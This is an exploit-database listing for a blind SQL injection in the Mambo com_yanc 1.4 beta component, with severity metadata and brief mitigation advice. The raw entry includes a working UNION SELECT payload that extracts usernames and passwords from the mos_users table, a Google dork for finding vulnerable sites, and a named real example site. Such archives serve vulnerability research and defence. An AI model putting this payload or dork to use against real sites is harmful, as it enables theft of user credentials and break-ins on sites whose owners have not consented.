header-logo
Suggest Exploit
vendor:
com_yanc
by:
Unknown
7.5
CVSS
HIGH
Blind Remote SQL Injection
89
CWE
Product Name: com_yanc
Affected Version From: 1.4 beta
Affected Version To: 1.4 beta
Patch Exists: NO
Related CWE:
CPE: a:mambo:com_yanc:1.4_beta
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln

The Mambo com_yanc v1.4 beta (id) component is vulnerable to blind remote SQL injection. By manipulating the 'listid' parameter in the 'index.php' file, an attacker can execute SQL queries and retrieve sensitive information, such as usernames and passwords, from the 'mos_users' table.

Mitigation:

The vendor has not released a patch for this vulnerability. However, users are advised to upgrade to a newer version of the component if available. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

------------------------------
-------------------------------

Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln

-------------------------------------------------------------

Bulan: Cyber-Security

-------------------------------------------------------------

Exploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

Example:http://www.tnrb.net/

-------------------------------------------------------------

google dork: inurl:index.php?option=com_yanc

-------------------------------------------------------------

# milw0rm.com [2007-05-17]

Navigation

Suggest Exploit

Services By CQR